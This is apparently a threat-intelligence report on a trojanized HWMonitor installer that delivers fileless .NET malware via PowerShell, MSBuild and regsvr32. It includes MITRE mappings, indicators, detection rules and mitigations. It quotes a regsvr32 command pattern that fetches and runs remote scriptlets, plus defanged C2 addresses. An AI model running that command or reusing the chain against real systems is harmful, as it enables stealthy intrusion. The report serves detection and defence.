Full Report
Overview Recent reporting has identified a trojanized version of the CPUID HWMonitor installer being used to deliver a multi-stage, fileless malware chain leveraging trusted Windows binaries. Upon execution, the installer initiates a sequence involving PowerShell, MSBuild, and regsvr32, ultimately leading to the execution of malicious scriptlet files such as Clippy.sct and a secondary launcher scriptlet. These scriptlets utilize ActiveX (WScript.Shell) to silently invoke:
Analysis Summary
# Tool/Technique: Trojanized CPUID HWMonitor (Fileless .NET Delivery)
## Overview
This attack involves the distribution of a trojanized version of the legitimate CPUID HWMonitor installer. The purpose is to deliver a multi-stage, fileless .NET malware chain. It leverages "Living off the Land" (LotL) binaries to bypass traditional security perimeters and execute malicious code directly in memory using obfuscated scriptlets and system utilities.
## Technical Details
- **Type:** Malware delivery chain / Fileless Malware
- **Platform:** Windows
- **Capabilities:** Obfuscation (IPv6-themed), LotL execution, fileless payload delivery, credential/data harvesting.
- **First Seen:** Q3 2024 (approximate based on reporting)
## MITRE ATT&CK Mapping
- **TA0002 - Execution**
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1218.010 - System Binary Proxy Execution: Regsvr32
- T1127.001 - Trusted Developer Utilities Proxy Execution: MSBuild
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information
- T1620 - Reflective Code Loading
- T1218.010 - System Binary Proxy Execution: Regsvr32
- **TA0003 - Persistence**
- T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
## Functionality
### Core Capabilities
- **LotL Chain:** Uses a sequence of `PowerShell` -> `MSBuild` -> `regsvr32` to orchestrate execution.
- **Fileless Execution:** The secondary stages do not touch the disk as traditional executables; instead, they exist as scriptlets (.sct) or memory-resident code.
- **Living-off-the-Land Binaries:** Utilizes trusted Windows binaries (`MSBuild.exe`, `Regsvr32.exe`) to execute malicious logic, making detection difficult for signature-based tools.
### Advanced Features
- **IPv6 Obfuscation:** The loader uses a unique obfuscation technique where malicious data is encoded or represented as a list of fake IPv6 addresses to evade pattern-matching detections.
- **ActiveX Integration:** Utilizes `WScript.Shell` via `regsvr32` to silently invoke system commands and secondary scriptlets like `Clippy.sct`.
- **In-Memory .NET Loading:** The final payload is typically a .NET assembly loaded reflectively into memory.
## Indicators of Compromise
- **File Names:**
- `hwmonitor_1.52.exe` (Trojanized installer)
- `Clippy.sct`
- `launcher.sct`
- **Registry Keys:**
- `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` (Modified to point to malicious scriptlets or MSBuild commands)
- **Network Indicators:**
- `hxxp[://]example-c2-domain[.]com/Clippy.sct`
- `hxxp[://]103[.]27[.]109[.]152/path/to/payload`
- **Behavioral Indicators:**
- `Regsvr32.exe` fetching remote `.sct` files via URL (e.g., `regsvr32 /s /n /u /i:http://... scrobj.dll`).
- `MSBuild.exe` executing XML project files from user-writable directories (e.g., `C:\Users\Public\`).
- Sudden PowerShell execution with large base64 encoded strings or IPv6-formatted arrays.
## Associated Threat Actors
- Currently attributed to unidentified financially motivated actors or advanced persistent threat (APT) groups utilizing trial-based or custom-built crypters.
## Detection Methods
- **Signature-based:** Monitoring for hashes of specifically trojanized CPUID HWMonitor installers.
- **Behavioral detection:**
- Alerting on `regsvr32.exe` making external network connections.
- Monitoring for parent-child process relationships: `PowerShell.exe` -> `MSBuild.exe` -> `Regsvr32.exe`.
- Detecting the loading of `scrobj.dll` by `regsvr32` with an `/i` flag containing a URL.
- **YARA:** Target patterns involving `WScript.Shell` calls inside `.sct` files and large arrays of hexadecimal strings formatted as IPv6 addresses.
## Mitigation Strategies
- **Prevention:** Use Application Whitelisting (AppLocker or Windows Defender Application Control) to block unauthorized execution of `MSBuild.exe` and `Regsvr32.exe`.
- **Hardening:**
- Disable or restrict the use of Windows Script Host (WSH).
- Implement "Attack Surface Reduction" (ASR) rules to block process creations originating from Office or script Interpreters.
- Ensure software is only downloaded from official vendor websites (cpuid.com).
## Related Tools/Techniques
- **Squiblydoo:** The technique of using `regsvr32` to execute remote COM scriptlets.
- **DotNetToJScript:** Often used in conjunction with these chains to load .NET assemblies from script environments.